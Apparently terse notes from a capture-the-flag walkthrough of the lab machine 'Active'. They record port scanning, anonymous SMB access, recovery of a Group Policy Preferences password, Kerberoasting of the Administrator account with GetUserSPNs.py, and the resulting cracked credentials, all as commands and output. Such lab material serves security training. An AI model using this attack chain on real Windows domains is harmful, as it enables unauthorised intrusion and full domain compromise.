53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49170,49172
PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 06:08:08Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC 49170/tcp open msrpc Microsoft Windows RPC 49172/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows Vista or Windows 7 SP1 (96%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 210: |_ Message signing enabled and required | smb2-time: | date: 2024-01-07T06:09:07 |_ start_date: 2024-01-07T05:56:40 |_clock-skew: -19s
Anonymous login successful Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Replication Disk SYSVOL Disk Logon server share Users Disk SMB1 disabled -- no workgroup available
smbclient //10.129.183.151/Replication -N
<?xml version="1.0" encoding="utf-8"?> <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User> </Groups>
active.htb\SVC_TGS edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
active.htb\SVC_TGS:GPPstillStandingStrong2k18
smbclient //10.129.183.151/Users -U SVC_TGS
get the user.txt
bloodhound-python --dns-tcp -c All -u SVC_TGS -p 'GPPstillStandingStrong2k18' -d active.htb -dc active.htb -ns 10.129.183.151 --zip
Â
try kerberos
Â
GetUserSPNs.py -request -dc-ip 10.129.183.151 active.htb/svc_tgs
Â
get hash
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$68b59e5c6b9eed7f8acf9e7909277546$4f2246ba749004258f251c0951bc107389267dc38a95f5c38a799012cccbf84734eaf300d95a94e0d6ff34f8c19a0b188d45ac08458b14404246b387bf56d7104bc8e2de1ccf874dc5e10fc79d5d0e15a2af94d3536e406db95641c89b8af4c2243d51d8b01611205f8d2caae5ac34be1d0ed73d16ab64193590d7829474ade852140a9f41c97e08798d5c0d500cec6933581dd5fabc74f243c0d8234c31e3d108f402ba1fbbc38712e23714af479721fa7d35bd66f5ecbe8a4cac6c8368edc1413bfad64f3167040d52a529c07e3d91aa4108f94b2bed83c548da49ec23ab55b9c305aa82f480a614308d4a5879c59e9003b2fdc9255d279b25ff9f4841f68f52af38df5ca832ba28434fb0506082c0ea2fbc7fe6265f50711cecd8988171e57a261803d0c106f4d87ff873d9c8e086ebd3726e1ee70fd71c6872ef1a990404724cd21ac5c6055f9ea973326d513ce36c080935a12e77f87268e569386d09bbe09d8e7cb5b8eeeb25d04cd1301321274942f300bb42eafe68ce0d72fe95e2d291b38d2203d477c7a08cb5f8c830d70e0ff0c769dc4a8158124492334fc2502876e480d939c92bee882a6eb5c5b5bd5a4a691a66b4996963877441893b1adf008ccf1dd77a9bb1f68714df1f3f30804778888d2281e02bff861a1760f7e5b4c3d27eaf5fd59726c3af41323a3550802df45eb93fe8cd17c78463ca2ff24c506a5883b5bf677e12eb9945a9133f82701b552d96a311520867c2744ebebf43ce2d2dbc0e077a0a936a8fbfe82a8038169c0f8db6fe92bd40980d97a27ab92a170cea8c3093d85343b071f07adcd24ecb2f4133454e96d5ce7a4a1cff881aefb65b37d7c121798de9eb93112e2cdfeaf1f96d11b51b2641f8527fe6757d58033b17a702d921926c13ce3a90576fc3537fdfd1cf85999b3a5fbe38454606ef28fd14c82cb2d211256f0117e02ebab5ae672a8d83bf39c6666d33fa5b1980b7b690c7edf04a1ab4b94a14bde3cbcc730853aabe09ac088fb105818570a0602daaebde134031129b59542abb8061d2b3b25396920d4c2db835b43e3d14b098ffceec3c16bccfa6f7b5ceaaa99dd6bb2417a95fe34fea5318136491aaabb3ebbd431b486e55fbb942f8f04e3fceceeb05054bc6f5dcffc50efa90910864d7621af8f864318dffe2ca544040bbf5937e9346a2fc972be8d00618401ecc6bc1c4366a19ee3d8ad890431326592190b245a0534d653905629127358444e85c
Administrator:Ticketmaster1968
smbmap -H 10.129.183.151 -u Administrator -p 'Ticketmaster1968'
then smbclient to connect, get the file
Â